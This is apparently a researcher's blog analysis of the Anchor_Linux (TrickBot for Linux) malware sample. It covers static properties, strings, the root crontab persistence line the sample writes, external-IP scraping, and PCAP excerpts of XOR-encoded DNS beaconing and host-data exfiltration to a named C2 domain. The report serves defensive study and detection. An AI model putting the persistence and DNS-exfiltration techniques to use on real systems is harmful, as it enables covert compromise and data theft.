Malware Analysis: Anchor_Linux

Aug 6, 2020 • malware_analysis

Disclaimer

The following is a Malware analysis report for the binary with SHA-256 hash c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc.
The binary can be downloaded from MalShare
I take no responsibility for any actions you take based on this report.
Use caution when downloading and executing malware.
Use a virtual machine, be safe, have fun.

Opinions

In my last post I took a look at TrickBot malware. This post will focus on Anchor_Linux, otherwise known as TrickBot for Linux.

As we will see in the analysis this sample functions very similarly to TrickBot on Windows, and utilizes Anchor_DNS as the C2 infrastructure.
This means that both this Linux malware and newer TrickBot variants on Windows can use the same C2 infrastructure.

As I mentioned in my last post TrickBot will continue to evolve until it is no longer profitable.
Right now one of the biggest ways to turn a profit for these bad actors is crypto currency mining.
While mining from a single machine is not very profitable, if you are able to distribute the mining to several hundred or thousand machines, especially ones you do not have to worry about the over head on, it can become rather profitable.
Linux is by far the most popular OS for servers on the internet, it was only a matter of time before we saw this evolution.

I only ran this sample for a short period so I did not see a stage two payload, only the initial discovery and beaconing.

Analysis Summary

When executed this malware immediately appends a line to /etc/crontab to setup persistence.
This line ensures the malware is ran every minute.

*/1 ** * *root/home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042

Once persistence is setup the malware executes uname to gather host details, as well as reads all /proc/$PID/cmdline files to gather info on all running processes.
A web request is made to an external site to gather the hosts external IP address.
In the strings we saw that there are several http and https options available.

http://checkip.amazonaws.com
http://ipecho.net/plain
http://ipinfo.io/ip
http://api.ipify.org
http://icanhazip.com
http://myexternalip.com/raw
http://wtfismyip.com/text
http://ip.anysrc.net/plain/clientip
https://checkip.amazonaws.com
https://ipecho.net/plain
https://ipinfo.io/ip
https://api.ipify.org
https://icanhazip.com
https://myexternalip.com/raw
https://wtfismyip.com/text
https://ip.anysrc.net/plain/clientip

Based on what we saw in the pcap it seems that the list of sites is likely iterated over until a result is returned.
In this case the first request returned a result, and no further requests were made.

Once the Discovery portion is complete the malware compiles the data in a format known to the Anchor_DNS C2 infrastructure.
The format is /anchor_linux/hostname_version/.client_id/#/LVER/1001/public_ip/payload, which is then xor’d with 0xb9 and hex encoded.

As we see in the pcap, packet 20 looks like this:

20   9.602723 192.168.1.101 → 192.168.1.1  DNS 314 Standard query 0x1916 A 898A926AB2D9AFF7CD2FFB3BE8A8A0545BB9BA96D8D7DAD1D6CBE6D5D0D7CCC.196CBDCD4D7CCC1E6F58D888C89888888978F8EFBFF8F81FD80FDFD89FF8DFD.8E8B808B898DFF88FB8EFB8D8AF8F8F888FF968996F58D888C8988888896888.989889688898E97888C8197888C97888896FF81.biillpi.com OPT

A DNS query for some_long_string.biillpi.com.
If we take everything before .biilpi[.]com, remove the ‘.’s, hex decode it, and xor it with a key of 0xb9 we get the following:

03+Ó.`.Nt.B.Q..íâ../anchor_linux/remnux_L4150111.67BF68D9DD0F4D729204F1B7B43AAA1F/0/L4150111/1001/107.158.15.11/F8

Once this initial discovery and exfiltration phase is complete the malware will continue to beacon using the Anchor_DNS framework.
Any proceeding payloads will be provided as answers to the queries.
In this run we did not see a stage two, or any subsequent payload delivery.

Based upon the strings we can also see that this malware has smb capabilities.

smb://
URL does not start with 'smb://'

Revealing the cross-platorm-ness that this malware is intending to reach.

Environment and tools


Static Analysis

Data Value
File Type ELF
Magic ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, stripped
File Size 782424 bytes
MD5 7d2595904aa6feb46b3e8f3262963042
SHA1 32f485eece997ee331809e98495641f2bddf8b3f
SHA256 c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc
SHA512 77b36c4a46ae236b0e0bf5b839239b742e437d9d1990408165be0096defd6562976a0c4158fd2c9cd61287b785ecb178864ca379437e1304d6664593ca1115c5
SSDEEP 12288:Y4BABjvg6LhrRQNCU48lIOmEt/csWpD361AqRNZGO/1Tkvxq:YPLhx8lIOmmUbAAqRNI
Entry Point 0x404620

Sections

Name Address Size Offset Type Flags
- 0x0 0x0 0x0 NULL -
.interp 0x400270 0x1c 0x270 PROGBITS A
.note.ABI-tag 0x40028c 0x20 0x28c NOTE A
.hash 0x4002b0 0x48c 0x2b0 HASH A
.dynsym 0x400740 0xed0 0x740 DYNSYM A
.dynstr 0x401610 0x5e7 0x1610 STRTAB A
.gnu.version 0x401bf8 0x13c 0x1bf8 GNU_versym A
.gnu.version_r 0x401d38 0xd0 0x1d38 GNU_verneed A
.rela.dyn 0x401e08 0x180 0x1e08 RELA A
.rela.plt 0x401f88 0xdb0 0x1f88 RELA AI
.init 0x402d38 0x17 0x2d38 PROGBITS AX
.plt 0x402d50 0x930 0x2d50 PROGBITS AX
.plt.got 0x403680 0x20 0x3680 PROGBITS AX
.text 0x4036a0 0x70f32 0x36a0 PROGBITS AX
.fini 0x4745d4 0x9 0x745d4 PROGBITS AX
.rodata 0x4745e0 0x2d200 0x745e0 PROGBITS A
.eh_frame_hdr 0x4a17e0 0x3c14 0xa17e0 PROGBITS A
.eh_frame 0x4a53f8 0x15594 0xa53f8 PROGBITS A
.gcc_except_table 0x4ba98c 0x6cd 0xba98c PROGBITS A
.tdata 0x6bbb78 0x4 0xbbb78 PROGBITS WAT
.tbss 0x6bbb80 0x58 0xbbb7c NOBITS WAT
.init_array 0x6bbb80 0x18 0xbbb80 INIT_ARRAY WA
.fini_array 0x6bbb98 0x8 0xbbb98 FINI_ARRAY WA
.data.rel.ro 0x6bbba0 0x21b8 0xbbba0 PROGBITS WA
.dynamic 0x6bdd58 0x210 0xbdd58 DYNAMIC WA
.got 0x6bdf68 0x88 0xbdf68 PROGBITS WA
.got.plt 0x6be000 0x4a8 0xbe000 PROGBITS WA
.data 0x6be4c0 0x288 0xbe4c0 PROGBITS WA
.bss 0x6be760 0x1a28 0xbe748 NOBITS WA
.comment 0x0 0x3e 0xbe748 PROGBITS MS
.shstrtab 0x0 0x10c 0xbe786 STRTAB -

Symbols

Type Bind Vis Ndx Name
NOTYPE LOCAL DEFAULT UND  
NOTYPE WEAK DEFAULT UND _ZGTtnam
FUNC GLOBAL DEFAULT UND inet_ntop@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND getenv@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND dl_iterate_phdr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND free@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND recv@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND pthread_create@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND pthread_detach@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND abort@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __errno_location@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND srandom@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND unlink@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strncpy@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strncmp@GLIBC_2.2.5 (2)
OBJECT GLOBAL DEFAULT UND stdout@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strcpy@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND writev@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND islower@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND toupper@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND qsort@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fread@GLIBC_2.2.5 (2)
OBJECT GLOBAL DEFAULT UND stdin@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND vsnprintf@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND setsockopt@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __xpg_strerror_r@GLIBC_2.3.4 (4)
FUNC GLOBAL DEFAULT UND fcntl@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND write@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND getpid@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND _ITM_RU1
FUNC GLOBAL DEFAULT UND getpeername@GLIBC_2.2.5 (2)
FUNC WEAK DEFAULT UND pthread_once@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND fclose@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND opendir@GLIBC_2.2.5 (2)
FUNC WEAK DEFAULT UND __pthread_key_create@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND dcgettext@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strlen@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND getpwuid_r@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND chdir@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __stack_chk_fail@GLIBC_2.4 (5)
FUNC GLOBAL DEFAULT UND getuid@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND system@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND send@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND strchr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fgetpos@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND rewind@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND pthread_mutex_destroy@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND snprintf@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND nanosleep@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND strrchr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND ftruncate@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND uname@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND gmtime_r@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND dup@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND lseek@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND gettimeofday@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND _ITM_addUserCommitAction
FUNC GLOBAL DEFAULT UND fputs@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fnmatch@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND _ITM_memcpyRtWn
FUNC GLOBAL DEFAULT UND __strtok_r@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND memset@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND geteuid@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fscanf@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND ioctl@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND getcwd@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND sendto@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND close@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND setsid@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strspn@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND closedir@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fputc@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strcspn@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND memchr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND read@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND __libc_start_main@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND srand@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND memcmp@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fgets@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __tls_get_addr@GLIBC_2.3 (6)
FUNC GLOBAL DEFAULT UND getsockopt@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND execve@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND calloc@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strcmp@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND signal@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND syscall@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND feof@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND gmon_start
FUNC GLOBAL DEFAULT UND umask@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND if_nametoindex@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strtol@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND memcpy@GLIBC_2.14 (7)
FUNC GLOBAL DEFAULT UND inet_pton@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __xpg_basename@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND time@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fileno@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND inet_aton@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __xstat@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND readdir@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND random@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND get_current_dir_name@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND pthread_mutex_unlock@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND __rawmemchr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND malloc@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fflush@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __isoc99_sscanf@GLIBC_2.7 (8)
FUNC GLOBAL DEFAULT UND getifaddrs@GLIBC_2.3 (9)
FUNC GLOBAL DEFAULT UND __fxstat@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND listen@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND recvfrom@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND getlogin@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND clock_gettime@GLIBC_2.2.5 (10)
FUNC GLOBAL DEFAULT UND strpbrk@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fseek@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND realloc@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fdopen@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND asprintf@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND _ITM_RU8
FUNC GLOBAL DEFAULT UND freeifaddrs@GLIBC_2.3 (9)
FUNC GLOBAL DEFAULT UND poll@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND chmod@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND bind@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND readv@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND memmove@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND waitpid@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND atol@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND open@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND access@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fopen@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND _ITM_memcpyRnWt
FUNC GLOBAL DEFAULT UND pthread_join@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND jrand48@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND accept@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND getsockname@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strtoul@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND flock@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __cxa_atexit@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strcat@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND gethostname@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND sprintf@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND getppid@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND connect@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND fwrite@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __fprintf_chk@GLIBC_2.3.4 (4)
FUNC GLOBAL DEFAULT UND getaddrinfo@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strdup@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strerror@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND _ZGTtdlPv
FUNC GLOBAL DEFAULT UND sleep@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND pthread_mutex_init@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND fork@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strstr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND pthread_mutex_lock@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND rand@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __ctype_tolower_loc@GLIBC_2.3 (9)
FUNC GLOBAL DEFAULT UND freeaddrinfo@GLIBC_2.2.5 (2)
OBJECT GLOBAL DEFAULT UND stderr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND socket@GLIBC_2.2.5 (2)

Interesting Strings

/lib64/ld-linux-x86-64.so.2 (UNIX_PATH_REGEX)
/run/uui1 (UNIX_PATH_REGEX)
dd/reque (UNIX_PATH_REGEX)
Invalid address:%s  Can not resolv into IPv4/v6. (UNIX_PATH_REGEX)
Unknown address family :%d. Only IPv4/IPv6 supported so far. (UNIX_PATH_REGEX)
Can not decode info_type/info_class %d/%d yet (UNIX_PATH_REGEX)
smb:// (UNIX_PATH_REGEX)
URL does not start with 'smb://' (UNIX_PATH_REGEX)
Read/Write failed with (0x%08x) %s (UNIX_PATH_REGEX)
Can not enccode info_type/info_class %d/%d yet (UNIX_PATH_REGEX)
dev/null (UNIX_PATH_REGEX)
http://checkip.amazonaws.com (URL_REGEX, UNIX_PATH_REGEX)
http://ipecho.net/plain (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
http://ipinfo.io/ip (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
http://api.ipify.org (URL_REGEX, UNIX_PATH_REGEX)
http://icanhazip.com (URL_REGEX, UNIX_PATH_REGEX)
http://myexternalip.com/raw (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
http://wtfismyip.com/text (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
http://ip.anysrc.net/plain/clientip (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
https://checkip.amazonaws.com (URL_REGEX, UNIX_PATH_REGEX)
https://ipecho.net/plain (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
https://ipinfo.io/ip (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
https://api.ipify.org (URL_REGEX, UNIX_PATH_REGEX)
https://icanhazip.com (URL_REGEX, UNIX_PATH_REGEX)
https://myexternalip.com/raw (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
https://wtfismyip.com/text (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
https://ip.anysrc.net/plain/clientip (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
20:06:55 (IPV6_REGEX)
20:06:57 (IPV6_REGEX)
20:06:57 (IPV6_REGEX)
20:06:58 (IPV6_REGEX)
MM/dd/yy (UNIX_PATH_REGEX)
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly> (URL_REGEX, DOMAIN_REGEX)
>/>J>i>{> (UNIX_PATH_REGEX)
>*>/>T> (UNIX_PATH_REGEX)
/etc/crontab (UNIX_PATH_REGEX)
/proc/%s/cmdline (UNIX_PATH_REGEX)
/tmp/anchor.log (UNIX_PATH_REGEX)
Couldn't read a file:// file (UNIX_PATH_REGEX)
URL using bad/illegal format or missing URL (UNIX_PATH_REGEX)
Failed writing received data to disk/application (UNIX_PATH_REGEX)
Upload failed (at start/before it took off) (UNIX_PATH_REGEX)
Failed to open/read local data from file/application (UNIX_PATH_REGEX)
Socket not ready for send/recv (UNIX_PATH_REGEX)
Stream error in the HTTP/2 framing layer (UNIX_PATH_REGEX)
HTTP/1.%d %d (UNIX_PATH_REGEX)
CONNECT %s HTTP/%s (UNIX_PATH_REGEX)
multipart/mixed (UNIX_PATH_REGEX)
application/octet-stream (UNIX_PATH_REGEX)
text/plain (UNIX_PATH_REGEX)
multipart/form-data (UNIX_PATH_REGEX)
image/gif (UNIX_PATH_REGEX)
image/jpeg (UNIX_PATH_REGEX)
image/png (UNIX_PATH_REGEX)
image/svg+xml (UNIX_PATH_REGEX)
text/html (UNIX_PATH_REGEX)
application/pdf (UNIX_PATH_REGEX)
application/xml (UNIX_PATH_REGEX)
oversized cookie dropped, name/val %zu + %zu bytes (UNIX_PATH_REGEX)
# https://curl.haxx.se/docs/http-cookies.html (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
Content-Range: bytes 0-%ld/%ld (UNIX_PATH_REGEX)
Content-Range: bytes %s%ld/%ld (UNIX_PATH_REGEX)
%s HTTP/%s (UNIX_PATH_REGEX)
Content-Type: application/x-www-form-urlencoded (UNIX_PATH_REGEX)
Received HTTP/0.9 when not allowed (UNIX_PATH_REGEX)
Lying server, not serving HTTP/2 (UNIX_PATH_REGEX)
HTTP/1.0 proxy connection set to keep alive! (UNIX_PATH_REGEX)
HTTP/1.1 proxy connection set close! (UNIX_PATH_REGEX)
HTTP/1.0 connection set to keep alive! (UNIX_PATH_REGEX)
Forcing HTTP/1.1 for NTLM (UNIX_PATH_REGEX)
Content-Range: bytes %s/%ld (UNIX_PATH_REGEX)
ftp://%s:%s@%s (UNIX_PATH_REGEX)
 HTTP/%1d.%1d%c%3d (UNIX_PATH_REGEX)
 HTTP/2 %d (UNIX_PATH_REGEX)
 RTSP/%1d.%1d%c%3d (UNIX_PATH_REGEX)
%s://%s (UNIX_PATH_REGEX)
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds (UNIX_PATH_REGEX)
 INFO/REPLY (UNIX_PATH_REGEX)
Cannot rewind mime/post data (UNIX_PATH_REGEX)
select/poll returned error (UNIX_PATH_REGEX)
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.) (UNIX_PATH_REGEX)
select/poll error (UNIX_PATH_REGEX)
Content-Type: text/parameters (UNIX_PATH_REGEX)
Content-Type: application/sdp (UNIX_PATH_REGEX)
Accept: application/sdp (UNIX_PATH_REGEX)
%s %s RTSP/1.0 (UNIX_PATH_REGEX)
Content-Type: application/dns-message (UNIX_PATH_REGEX)
0123456789abcdefABCDEF::. (IPV6_REGEX)
127.0.0.1/ (IPV4_REGEX)
file://%s%s%s (UNIX_PATH_REGEX)
%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s (UNIX_PATH_REGEX)
%s/%s@%s (UNIX_PATH_REGEX)
failed to resume file:// transfer (UNIX_PATH_REGEX)
Bad PASV/EPSV response: %03d (UNIX_PATH_REGEX)
OS/400 (UNIX_PATH_REGEX)
Doing the SSL/TLS handshake on the data stream (UNIX_PATH_REGEX)
FTP response aborted due to select/poll error: %d (UNIX_PATH_REGEX)
/var/lib/libuuid/clock.txt (UNIX_PATH_REGEX)
/dev/random (UNIX_PATH_REGEX)
/dev/urandom (UNIX_PATH_REGEX)
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugsbasic_string::_M_create (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
std::bad_alloc (IPV6_REGEX)
std::bad_cast (IPV6_REGEX)
std::bad_typeid (IPV6_REGEX)
std::bad_exception (IPV6_REGEX)

OSINT


Behavioral Analysis

Processes

PID User Command
1654 remnux sudo ./7d2595904aa6feb46b3e8f3262963042
1655 root ./7d2595904aa6feb46b3e8f3262963042
1660 root /bin/sh -c /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042
1663 root /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042
1664 root /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042
1667 root /bin/sh -c /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042
1668 root /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042

Modified Files

Process 1655 appended the following to /etc/crontab.

*/1 ** * *root/home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042

PCAP

Download

Protocols

Protocol Number of Packets
DNS 222
HTTP 2

Indicators of Compromise

  • *.biillpi[.]com

External IP Scraping

GET / HTTP/1.1
Host: checkip.amazonaws.com
User-Agent: test my ip
Accept: */*

HTTP/1.1 200 OK
Date: Thu, 06 Aug 2020 02:01:02 GMT
Server: lighttpd/1.4.53
Content-Length: 14
Connection: keep-alive

107.158.15.11

C2 Beaconing

34  10.874377 192.168.1.101 → 192.168.1.1  DNS 123 Standard query 0x85bf A 898A926AB2D9AFF7CD2FFB3BE8A8A0545BBBBA96.biillpi.com OPT
35  10.874542 192.168.1.101 → 192.168.1.1  DNS 123 Standard query 0xd994 AAAA 898A926AB2D9AFF7CD2FFB3BE8A8A0545BBBBA96.biillpi.com OPT

C2 Host Information Exfiltration

20   9.602723 192.168.1.101 → 192.168.1.1  DNS 314 Standard query 0x1916 A 898A926AB2D9AFF7CD2FFB3BE8A8A0545BB9BA96D8D7DAD1D6CBE6D5D0D7CCC.196CBDCD4D7CCC1E6F58D888C89888888978F8EFBFF8F81FD80FDFD89FF8DFD.8E8B808B898DFF88FB8EFB8D8AF8F8F888FF968996F58D888C8988888896888.989889688898E97888C8197888C97888896FF81.biillpi.com OPT
21   9.610991 192.168.1.101 → 192.168.1.1  DNS 314 Standard query 0x8b73 AAAA 898A926AB2D9AFF7CD2FFB3BE8A8A0545BB9BA96D8D7DAD1D6CBE6D5D0D7CCC.196CBDCD4D7CCC1E6F58D888C89888888978F8EFBFF8F81FD80FDFD89FF8DFD.8E8B808B898DFF88FB8EFB8D8AF8F8F888FF968996F58D888C8988888896888.989889688898E97888C8197888C97888896FF81.biillpi.com OPT